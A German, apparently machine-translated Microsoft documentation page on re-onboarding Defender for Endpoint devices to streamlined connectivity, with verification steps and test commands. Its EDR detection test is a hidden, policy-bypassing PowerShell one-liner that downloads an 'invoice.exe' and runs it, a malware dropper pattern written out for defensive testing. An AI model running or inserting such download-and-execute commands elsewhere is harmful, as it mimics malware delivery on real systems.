Hinweis
Für den Zugriff auf diese Seite ist eine Autorisierung erforderlich. Sie können versuchen, sich anzumelden oder das Verzeichnis zu wechseln.
Für den Zugriff auf diese Seite ist eine Autorisierung erforderlich. Sie können versuchen, das Verzeichnis zu wechseln.
Nutzen Sie diesen Artikel, um bestehende Microsoft Defender for Endpoint-Geräte wieder mit dem optimierten Konnektivitätspaket zu integrieren. Optimierte Konnektivität bündelt den zentralen Dienstverkehr von Defender for Endpoint auf eine kleinere Anzahl von Netzwerkzielen. Bevor Sie Geräte migrieren, konfigurieren Sie die erforderlichen Netzwerkziele und bestätigen, dass die Geräte die optimierten Konnektivitätsanforderungen erfüllen.
In den meisten Fällen müssen Sie Geräte vor dem erneuten Onboarding nicht offboarden. Wenden Sie das optimierte Onboarding-Paket an und starten Sie dann Windows-Geräte neu oder starten Sie den Defender for Endpoint-Dienst auf macOS und Linux-Geräten neu.
Wichtig
Überprüfen Sie die folgenden Einschränkungen, bevor Sie Geräte migrieren:
- Offboarding ist für den Wechsel zu einer vereinfachten Konnektivitätslösung nicht erforderlich. Nachdem Sie das aktualisierte Onboarding-Paket installiert haben, starten Sie Windows-Geräte neu oder starten Sie den Defender for Endpoint-Dienst auf macOS- und Linux-Geräten neu.
- Windows 10 Versionen 1607, 1703, 1709 und 1803 unterstützen das Reonboarding nicht. Führen Sie zunächst das Offboarding durch und anschließend das Onboarding mit dem aktualisierten Paket. Diese Versionen erfordern auch eine längere URL-Liste.
- Geräte, die den Microsoft Monitoring Agent (MMA) ausführen, unterstützen keine optimierte Konnektivität und müssen weiterhin Standardkonnektivität verwenden.
Hinweis
Das Defender-Bereitstellungstool kann zum Bereitstellen der Defender-Endpunktsicherheit auf Windows- und Linux-Geräten verwendet werden. Das Tool ist eine einfache, sich selbst aktualisierende Anwendung, die den Bereitstellungsprozess optimiert. Weitere Informationen finden Sie unter Bereitstellen Microsoft Defender Endpunktsicherheit auf Windows-Geräten mithilfe des Defender-Bereitstellungstools und Bereitstellen Microsoft Defender Endpunktsicherheit auf Linux Geräten mithilfe des Defender-Bereitstellungstools (Vorschau).
Migration von Geräten zu optimierter Konnektivität
Nutzen Sie die plattformspezifischen Verfahren in diesem Abschnitt, um bestehende Geräte von Standardkonnektivität auf optimierte Konnektivität zu migrieren.
Planung der Migration
Bevor Sie Geräte migrieren:
Planen Sie eine schrittweise Ausrollung: Beginnen Sie mit einer kleinen Anzahl von Geräten. Erweitern Sie den Rollout, nachdem Sie überprüft haben, dass die Testgeräte eine optimierte Konnektivität nutzen.
Verwenden Sie unterstützte Verwaltungstools: Für verwaltete Geräte verwenden Sie Bereitstellungsmethoden wie Intune, Konfigurations-Manager, Group Policy, Jamf Pro oder ein anderes unterstütztes Verwaltungstool.
Testen Sie die Cloud-Konnektivität: Bestätigen Sie, dass Geräte mit Defender for Endpoint-Diensten kommunizieren können. Weitere Informationen finden Sie unter Überprüfen der Clientkonnektivität mit Microsoft Defender for Endpoint-Dienst-URLs.
Bereiten Sie einen Rückrollplan vor: Halten Sie während der Migration die Standard-Konnektivitätsziele verfügbar. Wenn Probleme auftreten, wenden Sie das Standard-Verbindungs-Onboarding-Paket erneut an.
Validieren Sie den Erfolg der Migration: Überprüfen Sie, ob Geräte eine optimierte Konnektivität nutzen, bevor Sie die Standard-Core-Service-Ziele aus Ihrer Firewall- oder Proxy-Konfiguration entfernen. Lassen Sie weiterhin unterstützende Service-Destinationen zu, die für das Betriebssystem erforderlich sind, Updates, Zertifikatsvalidierung sowie Ihre Bereitstellungs- und Sicherheitsfunktionen. Weitere Informationen finden Sie unter Onboarding-Geräte mit optimierter Konnektivität.
Geräte oder Dienste nach dem erneuten Onboarding neu starten
Nachdem Sie das optimierte Onboarding-Paket angewendet haben, führen Sie die Aktion für das Betriebssystem des Geräts aus:
Windows: Neustarte das Gerät.
macOS: Neustarte das Gerät oder starte den Defender for Endpoint-Dienst neu:
sudo launchctl unload /Library/LaunchDaemons/com.microsoft.fresno.plist sudo launchctl load /Library/LaunchDaemons/com.microsoft.fresno.plistLinux: Neustarte das Gerät oder starte den Defender for Endpoint-Dienst neu:
sudo systemctl restart mdatp
Verwenden Sie die folgenden Optionen, um Windows 10 und Windows 11 Geräte zur optimierten Konnektivitätsmethode zu migrieren.
Migrieren von Windows 10- und Windows 11-Geräten
Wichtig
Windows 10 Versionen 1607, 1703, 1709 und 1803 unterstützen das Reonboarding nicht. Um vorhandene Geräte zu migrieren, müssen Sie sie mithilfe des Pakets für optimiertes Onboarding vollständig offboarden und erneut onboarden.
Allgemeine Informationen finden Sie unter Onboard Windows Client-Geräte.
Bestätigen Sie, dass die Geräte die Anforderungen an optimierte Konnektivität erfüllen.
Migrieren von Geräten mit einem lokalen Skript
Befolgen Sie die Anleitung in Windows-Geräte mit einem lokalen Skript onboarden unter Verwendung des optimierten Onboarding-Pakets. Nachdem du das Paket installiert hast, starte das Gerät neu.
Migrieren von Geräten mithilfe von Gruppenrichtlinien
Folgen Sie den Anweisungen in Onboard Windows Devices using Group Policy mit dem optimierten Onboarding-Paket. Nachdem du die Richtlinie angewendet hast, starte das Gerät neu.
Migrieren von Geräten mit Microsoft Intune
Microsoft Intune ist das empfohlene Werkzeug zum Konfigurieren und Verteilen von Microsoft Defender for Endpoint-Funktionen auf Geräten. Intune ist jedoch ein separates Produkt, das nicht Teil von Defender für Endpunkt ist und nicht in allen Abonnements enthalten ist. Um Intune zu verwenden, benötigen Sie ein Abonnement, das es enthält, oder Sie können es separat als eigenständiges Abonnement oder Add-On kaufen. Wenn Sie nicht über Intune verfügen, können Sie eine der anderen Methoden in diesem Artikel verwenden. Weitere Informationen finden Sie unter Microsoft Intune-Lizenzierung.
Befolgen Sie die Anweisungen in "Aktualisieren Sie den Onboarding-Status für ein Windows-Gerät mit dem optimierten Onboarding-Paket. Die Option Auto from Connector wendet das Onboarding-Paket nicht automatisch auf bestehende Geräte erneut an. Erstellen Sie eine neue Onboarding-Richtlinie, weisen Sie sie einer Testgruppe zu und bestätigen, dass die Geräte die Richtlinie erhalten. Nachdem du die Richtlinie angewendet hast, starte die Geräte neu.
Migrieren von Geräten mit Microsoft Configuration Manager
Folgen Sie den Anweisungen in Onboardinginformationen für vorhandene Geräte aktualisieren, um das optimierte Onboardingpaket bereitzustellen.
Migrieren von VDI-Geräten mithilfe der optimierten Methode
Folgen Sie den Anweisungen in Einbinden von nicht persistenten Geräten der Virtual Desktop Infrastructure (VDI) mit dem optimierten Paket für das Onboarding. Nachdem du das Paket installiert hast, starte das Gerät neu.
Überprüfen Sie die migrierte Gerätekonnektivität
Verwenden Sie die folgenden Methoden, um zu bestätigen, dass migrierte Geräte eine optimierte Konnektivität nutzen.
Verwende den Client Analyzer unter Windows
Führen Sie den Microsoft Defender for Endpoint Client Analyzer auf einem migrierten Windows-Gerät aus, um zu überprüfen, dass das Gerät eine Verbindung mit den optimierten Endpunkten herstellt. Der Analyzer verwendet automatisch das auf dem Gerät konfigurierte Onboarding-Paket. Für Anweisungen siehe Führe den Client-Analyzer unter Windows aus und verifiziere die Client-Verbindung zu Microsoft Defender for Endpoint-Service-URLs.
Verbindungstyp mit Advanced Hunting nachverfolgen
Nutzen Sie erweiterte Suche im Microsoft Defender-Portal, um den Konnektivitätstyp anzuzeigen, den die Geräte in der Tabelle DeviceInfo angeben:
-
Spaltenname:
ConnectivityType. -
Mögliche Werte: Leer,
Streamlined, oderStandard. - Datentyp: String.
- Beschreibung: Die Art der Verbindung vom Gerät zum Cloud-Dienst Defender for Endpoint.
Nachdem ein migriertes Gerät die Kommunikation mit dem EDR-Befehls- und Kontrollkanal hergestellt hat, lautet Streamlinedder Wert . Wenn Sie ein Standard-Onboarding-Paket erneut anwenden, ändert sich der Wert zu Standard. Der Wert bleibt leer für Geräte, die noch nicht versucht haben, erneut eingebunden zu werden.
Nutzen Sie die erweiterten Suchanfragen später in diesem Artikel, um einzelne Geräte und Bereitstellungssummen zu überprüfen. Für das Schema siehe DeviceInfo-Tabelle.
Verfolgen Sie die lokale Anbindung in Windows Ereignisanzeige
Verwenden Sie das SENSE-Betriebsprotokoll in Windows Ereignisanzeige, um zu bestätigen, dass ein Windows Gerät mit einem optimierten Ziel verbunden ist.
Wählen Sie Start aus, geben Sie
Ereignisanzeigeein, und drücken Sie die Enter-Taste.Unter Log-Zusammenfassung klicken Sie doppelt auf Microsoft-Windows-SENSE/Operational.
Sie können auch Anwendungs- und Dienstprotokolle>Microsoft>Windows>SENSE erweitern und dann Betriebsbereit auswählen.
Finden Sie die Ereignis-ID 4, die eine erfolgreiche Verbindung zu einem Defender for Endpoint-Verarbeitungsserver aufzeichnet. Bestätigen Sie, dass der kontaktierte Server die Domain
endpoint.security.microsoft.comverwendet. Zum Beispiel:Contacted server 6 times, all succeeded, URI: <region>.<geo>.endpoint.security.microsoft.com. <EventData> <Data Name="UInt1">6</Data> <Data Name="Message1">https://<region>.<geo>.endpoint.security.microsoft.com> </EventData>Überprüfen Sie die Ereignis-ID 5 auf Verbindungsfehler.
Hinweis
SENSE ist der interne Name des Verhaltenssensors, der Defender for Endpoint antreibt. Weitere Informationen zu den vom Dienst erfassten Ereignissen finden Sie unter Überprüfen von Ereignissen und Fehlern im Ereignisanzeige.
Führen Sie optionale Windows-Funktionstests aus
Bestätigen Sie nach der Migration, dass das Gerät weiterhin im Geräteinventar mit derselben Geräte-ID erscheint. Überprüfen Sie die Zeitleiste des Geräts, um sicherzustellen, dass weiterhin Ereignisse eintreffen.
Testen der Live Response-Konnektivität
Starte eine Live-Response-Sitzung auf einem Testgerät und führe einen einfachen Befehl aus, um zu bestätigen, dass die Sitzung reagiert. Weitere Informationen finden Sie unter Untersuchen von Entitäten auf Geräten mithilfe von Liveantworten.
Konnektivität für automatisierte Untersuchungen und Reaktionen testen
Bestätigen Sie, dass das Gerät die Anforderungen für automatisierte Untersuchung und Reaktion erfüllt. Weitere Informationen finden Sie unter Konfigurieren automatisierter Untersuchungs- und Antwortfunktionen.
Testen der über die Cloud bereitgestellten Schutzkonnektivität
Überprüfen Sie die cloudbasierte Schutzverbindung auf einem Windows-Testgerät.
Führen Sie in einer Eingabeaufforderung mit erhöhten Rechten (ein Eingabeaufforderungsfenster, das Sie geöffnet haben, indem Sie Als Administrator ausführen ausgewählt haben) die folgenden Befehle aus:
Tipp
Der erste Befehl ändert das Verzeichnis in die neueste Version von <antimalware platform version> in %ProgramData%\Microsoft\Windows Defender\Platform\<antimalware platform version>. Wenn dieser Pfad nicht vorhanden ist, wechselt er zu %ProgramFiles%\Windows Defender.
(set "_done=" & if exist "%ProgramData%\Microsoft\Windows Defender\Platform\" (for /f "delims=" %d in ('dir "%ProgramData%\Microsoft\Windows Defender\Platform" /ad /b /o:-n 2^>nul') do if not defined _done (cd /d "%ProgramData%\Microsoft\Windows Defender\Platform\%d" & set _done=1)) else (cd /d "%ProgramFiles%\Windows Defender")) >nul 2>&1
MpCmdRun.exe -ValidateMapsConnection
Weitere Informationen zu MpCmdRun finden Sie unter Konfigurieren und Verwalten Microsoft Defender Antivirus mit dem MpCmdRun-Befehlszeilentool.
Testblock auf den ersten Blick
Befolgen Sie die Anweisungen für die Demonstration von Block at First Sight (BAFS) in den Demonstrationen zu Defender for Endpoint.
SmartScreen testen
Folgen Sie den Anweisungen zur SmartScreen-Demonstration auf der Seite Microsoft Defender SmartScreen Demo (msft.net).
PowerShell-Erkennungstest
Erstellen Sie auf dem Windows Gerät einen Ordner:
C:\test-MDATP-test.Öffnen Sie die Eingabeaufforderung als Administrator.
Führen Sie im Eingabeaufforderungsfenster den folgenden PowerShell-Befehl aus:
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe'
Wenn der Befehl erfolgreich ausgeführt wird und die Testdatei ausgeführt wird, ist der Windows EDR-Erkennungstest abgeschlossen und innerhalb weniger Minuten erscheint eine neue Warnung im Microsoft Defender-Portal. Weitere Informationen finden Sie unter Ausführen eines EDR-Erkennungstests.
Teste die Konnektivität auf macOS und Linux
Führe den folgenden Befehl aus, um zu prüfen, ob edr_partner_geo_location verfügbar ist. Der Wert sollte das Format GW_<geo>verwenden, wobei <geo> der geografische Standort Ihrer Organisation ist:
mdatp health --details edr
Führen Sie den Konnektivitätstest durch und bestätigen Sie, dass die Ergebnisse die Domäne endpoint.security.microsoft.com enthalten:
mdatp connectivity test
Erwarten Sie zwei Ergebnisse für /storage, und jeweils ein Ergebnis für /mdav, /xplat, und /packages. Beispiel: https://mdav.us.endpoint.security.microsoft.com/storage.
Konnektivitätstyp für migrierte Geräte abfragen
Führen Sie die folgende Abfrage aus, um Onboard-Geräte aufzulisten und den zuletzt gemeldeten Konnektivitätstyp für jedes Gerät anzuzeigen:
DeviceInfo
| where OnboardingStatus == "Onboarded"
| summarize arg_max(Timestamp, ConnectivityType) by DeviceName
Führen Sie folgende Abfrage aus, um die Onboard-Geräte nach Betriebssystem und Konnektivitätstyp zu zählen:
DeviceInfo
| where OnboardingStatus == "Onboarded"
| summarize arg_max(Timestamp, ConnectivityType, OSPlatform) by DeviceName
| summarize count() by OSPlatform, ConnectivityType
| render columnchart
Verwende den Client Analyzer auf macOS und Linux
Führen Sie den XMDE Client Analyzer aus, um Konnektivitäts- und Gesundheitsdiagnosen zu sammeln. Verwenden Sie das Verfahren für das Betriebssystem des Geräts: